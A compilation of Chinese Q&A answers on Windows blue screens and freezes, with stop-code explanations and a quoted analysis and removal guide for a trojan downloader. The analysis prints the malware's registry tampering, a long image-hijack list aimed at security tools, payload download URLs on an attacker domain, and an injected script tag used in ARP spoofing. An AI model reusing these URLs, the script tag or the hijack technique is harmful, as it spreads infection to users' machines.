電腦解機器碼為什麼藍屏
❶ 修改機器碼導致藍屏
魯濱遜不屑守成,出海闖天下。在遭遇海難流落到荒島上以後,他運用自己的頭腦和雙手,把荒島改造成「世外桃源"。經歷千辛萬苦,回到了英國。
❷ 急!電腦藍屏0x0000007b如何解決
-- 開機出現0x0000007b
啟動計算機時,可能收到以下錯誤信息之一:
•STOP:0x0000007B (parameter1, parameter2, parameter3, parameter4)
INACCESSIBLE_BOOT_DEVICE •Setup has encountered a fatal error that prevents it from continuing.
Contact your proct support representative for assistance.The following status will assist them in diagnosing the problem.
(0x4, 0x1, 0, 0)
Setup cannot continue.Power down or reboot your computer now. 在 Windows XP 安裝期間,如果安裝程序在安裝過程中重新啟動,也可能收到「Stop 0x0000007B」錯誤信息。如果在安裝程序運行期間收到 Stop 錯誤,您將會收到第二條錯誤信息。要解決此問題,請閱讀以下四節,以確定是否有某個問題描述適用於您的情況。如果都不適用,請參考本文結尾處的一般疑難解答步驟。
回到頂端引導扇區病毒如果您的計算機感染了引導扇區病毒,則可能會收到「Stop 0x0000007B」錯誤信息。檢查您的計算機是否染上了病毒。如果您發現了病毒,則還要在再次使用軟盤前檢查這些軟盤是否感染了病毒。
Microsoft 不提供可檢測或清除計算機病毒的軟體。如果您懷疑或證實計算機感染了病毒,請獲取最新的防病毒軟體。要獲取防病毒軟體製造商的列表,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
49500 (http://support.microsoft.com/kb/49500/) 防病毒軟體供應商列表注意:您可能需要使用多種病毒檢測軟體來檢測和刪除各類病毒。
重要說明:如果計算機已感染了病毒,它可能還會容易受到其他形式的攻擊。我們建議您按照CERT (http://www.cert.org/) 網站上發布的指導,重建可能染上病毒的 Internet 前沿伺服器。Internet 前沿伺服器是在沒有防火牆或其他保護的情況下工作的伺服器。另一個很好的觀念是,如果任何其他計算機由於接近已感染病毒的計算機而具有染上病毒的風險,則在這些計算機重新投入使用前,重建所有這些計算機。
如果您的 Windows XP 計算機已經感染了病毒,並且病毒檢測程序無法清除該病毒並修復系統,則必須對硬碟進行重新分區和格式化,然後重新安裝 Windows XP。 有關在 Windows XP 中對硬碟進行分區和格式化的其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
313348 (http://support.microsoft.com/kb/313348/) 如何在 Windows XP 中對硬碟進行分區和格式化 有關如何在 Windows XP 中保護引導扇區免受病毒侵害的其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
122221 (http://support.microsoft.com/kb/122221/) 如何保護 Windows 中的引導扇區免受病毒侵害 回到頂端設備驅動程序問題在以下情況中,您可能會收到「Stop 0x0000007B」錯誤信息:
•計算機引導控制器所需的設備驅動程序未被配置為在開機過程中啟動。•計算機的引導控制器所需的設備驅動程序已經損壞。•Windows XP 注冊表中的信息(與開機過程中設備驅動程序的載入方式有關的信息)已經損壞。Windows XP 要求微型埠驅動程序,以便與用於啟動計算機的硬碟控制器通信。如果 Windows XP 沒有為控制器提供設備驅動程序,或者使用的是已損壞或不兼容的驅動程序,則必須用與您的控制器和 Windows XP 兼容的有效副本替換該驅動程序。
在 Windows XP 安裝的第一個階段,安裝程序在屏幕底部顯示以下消息:
如果必須安裝第三方 SCSI 或 RAID 驅動程序,請按 F6 鍵。 按 F6 鍵,然後按照說明安裝來自原始設備製造商 (OEM) 的大容量存儲設備驅動程序。 有關使用 F6 鍵來載入受支持的 OEM 設備驅動程序的其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
314859 (http://support.microsoft.com/kb/314859/) 在 Windows XP 和 Windows Server 2003 安裝過程中按 F6 鍵即可獲得有限的 OEM 驅動程序支持 要確定您的硬碟控制器是否與 Windows XP 兼容並詳細了解可以從 Windows XP 光碟或下載中心獲取的驅動程序,請參閱最新的 Windows XP 硬體兼容列表 (HCL)。 有關最新 Windows XP HCL 的其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
314062 (http://support.microsoft.com/kb/314062/) 最新的 Windows XP 硬體兼容列表 如果您的硬碟控制器未在 HCL 中列出,則與計算機、系統板或硬碟控制器的製造商聯系,了解與驅動程序的可用性有關的信息。Microsoft 並不保證非 HCL 設備一定有合適的解決方案。 有關其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
315239 (http://support.microsoft.com/kb/315239/) Microsoft 對未在 Windows HCL 上出現的硬體的支持策略 如果 Windows XP 注冊表中的系統配置單元被損壞,則 Windows XP 可能無法載入引導控制器所要求的微型埠設備驅動程序。若要解決此問題,請還原注冊表備份。 有關還原注冊表備份的其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
307545 (http://support.microsoft.com/kb/307545/) 如果注冊表已經損壞並導致 Windows XP 無法啟動,應該如何恢復 回到頂端硬體問題如果在引導控制器和其他控制器之間(或在 SCSI 設備之間)存在資源沖突,您可能會收到「Stop 0x0000007B」錯誤信息。如果驅動器轉換未執行或已更改,您也可能會收到此 Stop 錯誤信息。要解決此問題,請按照下列步驟操作:
1.如果在引導控制器和其他控制器之間存在 IRQ 或 I/O 埠地址沖突,則 Windows XP 或者停止響應(掛起),或者顯示「Stop 0x0000007B」錯誤信息。如果最近添加了新硬體,則卸下該新硬體,或對它進行重新配置,以使它不與以前安裝的任何其他控制器的資源發生沖突。2.如果您使用 SCSI 硬碟,則檢查 SCSI 鏈是否正確終結。刪除任何未使用的 SCSI 設備,或者確保每個 SCSI ID 都是唯一的。3.確保驅動器轉換已經打開(如果要求)並且尚未更改。例如,如果您最近更換了控制器,則可能發生此問題。 有關此問題的其他信息,請單擊下面的文章編號,以查看 Microsoft 知識庫中相應的文章:
314082 (http://support.microsoft.com/kb/314082/) 將 Windows XP 系統磁碟移動到另一台計算機時收到「Stop 0x0000007B」錯誤 回到頂端其他問題「Stop 0x0000007B」錯誤信息的其他可能原因包括:
•啟動卷已損壞,無法由 Windows XP 初始化。如果文件系統已損壞並且 Windows XP 無法在啟動過程中初始化啟動卷,則將該驅動器移動到運行 Windows XP 的其他計算機上並在該驅動器上運行 chkdsk 命令,或者嘗試在驅動器上的單獨文件夾中創建 Windows XP 的並行安裝。Windows XP 安裝程序在復制文件之前檢查卷的完整性,且可能會在檢查過程中修復一些問題。•您目前在由 Microsoft Windows NT 4.0 創建的鏡像啟動分區上安裝 Windows XP。Windows XP 不支持 Windows NT 4.0 Ftdisk 卷集。如果您運行的是 Microsoft Windows 2000,則在升級到 Windows XP 之前,必須將所有 Ftdisk 卷集轉換為動態卷。如果您運行的是 Windows NT 4.0,則在升級到 Windows XP 之前,應斷開所有鏡像並備份帶區、RAID5 或擴展卷集上的所有數據。Ftdisk 集在升級後可能無法訪問
❸ 為什麼我的電腦老是會藍屏
A problem has been detected and windows has been shut down to prevent damage to you compyter.
the problem seems to be caused by the following file ati2dray.
if this is the first time you've seen this stop error screen,restart your computer,if this screen appears again,follow these steps,
一問題已發現和Windows已經關閉,以防止破壞你compyter 。
這個問題似乎是造成下列檔案ati2dray 。
如果這是您第一次看過此Stop錯誤屏幕,重新啟動計算機,如果此屏幕再次出現,請按照下列步驟操作,
the device driver got stuck in an infinite loop,this usually indicates problem with the device itself or with the device programming the hardware incorrectly.
設備驅動程序得到停留在一個無限循環,這通常表示的問題,與設備本身或與設備編程的硬體錯誤。
please check with your hardware device vendor for any driver updates.
請檢查您的硬體設備供應商的任何驅動程式更新。
technical information:
***stop:0x000000EA (0x88a80b58,0x89791eco,0xba4efcbc,0x00000001) ati2dvag
技術資料:
***停止: 0x000000ea ( 0x88a80b58 , 0x89791eco , 0xba4efcbc , 0x00000001 ) ati2dvag
通常是由顯卡或顯卡驅動程序引發的. 我出現過這個情況 我從新下載了顯卡驅動
先升級最新的顯卡驅動, 如果不行, 則需要更換顯卡測試故障是否依然發生
我可以非常負責人的告訴你 就是顯卡驅動的問題
ati2dvag 就是顯卡驅動
❹ 我的電腦安全模式被病毒破壞,一進安全模式就藍屏,怎麼解決啊
借用一下cz8765083的回答,很全面:
修復,不過很復雜的 ,比重裝個系統麻煩多了
最近發現很多人出現了打不開sha軟體 反病 毒工具 甚至帶有病 毒字樣的窗口 今天就接到了這樣的一個樣本 先前
這是一個可以說結合了幾乎所有病 毒的特徵的病毒 除了感染文件之外 可以說是比熊貓有過之而無不及!
病毒特徵:
1.破壞安全模式
2.結束常見殺毒軟體以及反病毒工具進程
3.監控窗口
4.關閉自動更新以及Windows安全中心
5.屏蔽顯示隱藏文件
6.下載木馬
7.IFEO映像劫持
8.GHOST文件引導破壞
9.各盤符均有引導啟動關聯文件,即便你重裝系統盤也照樣發作
分析報告
File: 1201AEC1.exe
Size: 36435 bytes
MD5:
SHA1:
CRC32: 27CA1195
加殼方式:UPX
病毒運行後
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面釋放一個同樣由8個數字和字母組成的組合的文件名的dll 和一個同名的dat 文件
我這里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
這個隨機的數字應該與機器碼有關
該dll插入Explorer進程 Timplatform以及ctfmon進程
刪除C:\WINDOWS\system32\verclsid.exe
將其重命名為verclsid.exe.bak
釋放41115BDD.exe(隨機8位)和autorun.inf到除系統分區外的其他分區
注冊表相關操作
刪除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破壞安全模式
修改
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值
為0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden為0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden為0x00000001
屏蔽顯示隱藏文件
修改常見殺毒軟體服務的start鍵值為0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004
修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start鍵值為0x00000004
關閉自動更新
添加IFEO映像劫持項( 我的意見是用Autoruns刪除映像劫持)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe
被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那個dat文件
下載dl1.exe到臨時文件夾
首先下載http://google.xxxx38.org/update/down.txt看病毒是否需要更新
然後分別下載http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe 到program files 文件夾 並把他們命名為ycnt1.exe~ycnt10.exe
具體每個文件的生成物就不一一列舉了
不過值得一提的是ycnt9.exe這個木馬
他生成C:\WINDOWS\system32\win1ogo.exe
並且該木馬試圖向區域網內所有用戶的80埠每隔5000ms進行arp欺騙
插入<script language=javascript src=http://google.171738.org/ad2.js></script>代碼
也就是區域網內所有用戶在打開網頁時都會被插入這段代碼
所有木馬文件植入完畢後 生成物如下
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
sreng日誌反映如下(在處理一些東西後掃描的這里提前列出)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft
Shared\MSINFO\41115BDD.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-
2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
解決辦法如下:
1.確定那個8位隨機數的dll的名稱
這里我們選用winrar確定那個dll的名稱
方法是:打開winrar.exe
工具 查看
在上面的地址欄中 進入c:\program files\common files\microsoft shared\msinfo目錄
我這台被感染的電腦的文件名為41115bdd.dll
2.使用強制刪除工具刪除那個dll文件
這里我們選用Xdelbox1.2這個軟體
XDelBox1.2(Dos級別滅殺工具):
1、dos級文件刪除方式,打造病毒清除新模式
2、無須進入安全模式,即可刪除所有病毒文件
3、支持一次重啟批量刪除多個文件
4、復制路徑的刪除添加方式更適用於網路求助(支持拖曳)
注意:刪除時復制所有要刪除文件的路徑,在待刪除文件列表裡點擊右鍵選擇從剪貼板導入。導入後在要刪除文件上點擊右鍵,選擇立刻重啟刪除,電腦會重啟進入DOS界面進行刪除操作,刪除完成後會自動重啟進入你安裝的操作系統。操作前注意保存電腦中正在打開的文檔。有關XDelBox的詳細說明請看xdelbox1.2目錄下help.chm
重起機器後
3.恢復被映像劫持的軟體
這里我們使用autoruns這個軟體 由於這個軟體也被映像劫持了 所以我們隨便把他改個名字
打開這個軟體後 找到Image hijack (映像劫持)
刪除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe
以外的所有項目
4.此時我們就可以打開sreng了 呵呵
打開sreng
系統修復 高級修復 點擊修復安全模式 在彈出的對話框中點擊是
5.恢復顯示隱藏文件
把下面的 代碼拷入記事本中然後另存為1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
雙擊1.reg把這個注冊表項導入
好了 此時病毒對於我們的所有限制已經解除了
6.清除其下載的木馬了
重起機器 進入安全模式
雙擊我的電腦,工具,文件夾選項,查看,單擊選取"顯示隱藏文件或文件夾"
清除"隱藏受保護的操作系統文件
用WINRAR打開 然後查看以下路徑,將發現的名字都刪(裡面是病毒下載下來的木馬)
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(隨機8位數字字母組合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm(隨機8位數字字母組合)
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\41115BDD.hlp(隨機8位數字字母組合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe(如果有的話)
最後別忘了
7.還是用winrar 刪除各個分區下面的autorun.inf和 41115BDD.exe(隨機8位數字字母組合)
一定不要雙擊 最好的方法是用winrar看
8.裝殺毒軟體 保護好你的電腦
到此為止,病毒已經完全清除。。。
❺ 電腦換機器碼為什麼會死機
由硬體原因引起的死機
1.散熱不良
2.電腦機箱受到撞擊
3.主機箱內灰塵太多沒有清理
4.主板主頻和CPU主頻不匹配
5.軟硬體不兼容
6.內存條松動、虛焊或內存晶元本身質量所致
7.硬碟老化或由於使用不當造成壞道、壞扇區
8.超頻提高了CPU的工作頻率,同時,也可能使其性能變得不穩定
9.由於音效卡或顯示卡的設置沖突,引起異常錯誤
10.內存容量越大越好,應不小於硬碟容量的0.5~1%
11.少數不法商人在給顧客組裝兼容機時,使用質量低劣的板卡、內存
由軟體原因引起的死機
1.病毒可以使計算機工作效率急劇下降,造成頻繁死機
2.CMOS設置不當
3.系統文件的誤刪除
4.初始化文件遭破壞
5.動態鏈接庫文件(DLL)丟失
6.硬碟剩餘空間太少或碎片太多
7.BIOS升級失敗
8.軟體升級不當
9.最好少用軟體的測試版,因為測試軟體通常帶有一些BUG或者在某方面不夠穩定,使用後會出現數據丟失的程序錯誤、死機或者是系統無法啟動
10.不要把軟體安裝所在的目錄直接刪掉,如果直接刪掉的話,注冊表以及Windows目錄中會有很多垃圾存在,久而久之,系統也會變不穩定而引起死機。
11.因為這些軟體可能隱藏著病毒,一旦執行,會自動修改你的系統,使系統在運行中出現死機
12.應用軟體的缺陷
13.啟動的程序太多
14.非法操作
15.非正常關閉計算機
16.內存中沖突
❻ 藍屏機器碼提問
當開機藍屏出現如下藍屏代碼:0x000000BE:ATTEMPTED_WRITE_TO_READONLY_MEMORY
電腦藍屏分析:
◆錯誤分析:某個驅動程序試圖向只讀內存寫入數據造成的. 通常是在安裝了新的驅動程序, 系統服務或升級了設備的固件程序後.
電腦藍屏解決:
◇解決方案:如果在錯誤信息中包含有驅動程序或者服務文件名稱, 請根據這個信息將新安裝的驅動程序或軟體卸載或禁用.
❼ 藍屏代碼0x0000000EA
藍屏代碼:0x000000EA
藍屏原因:顯示驅動程序陷入無限循環。這通常表明視頻硬體或顯示驅動程序有問題
解決方法:1、禁用「停止」消息中標識的驅動程序或所有新近安裝的驅動程序
2、如果計算機無法正常啟動,應嘗試以「最後一次的正確配置」或「安全模式」啟動,然後刪除或禁用新近添加的程序或驅動程序。
----------------------------------------------------------
這個一般是顯卡驅動的問題,可能是驅動本身,也有可能是當前的顯卡驅動無法支持此款游戲。建議查看游戲的詳細運行需求,或者升級顯卡驅動。
0x000000EA:THREAD_STUCK_IN_DEVICE_DRIVER
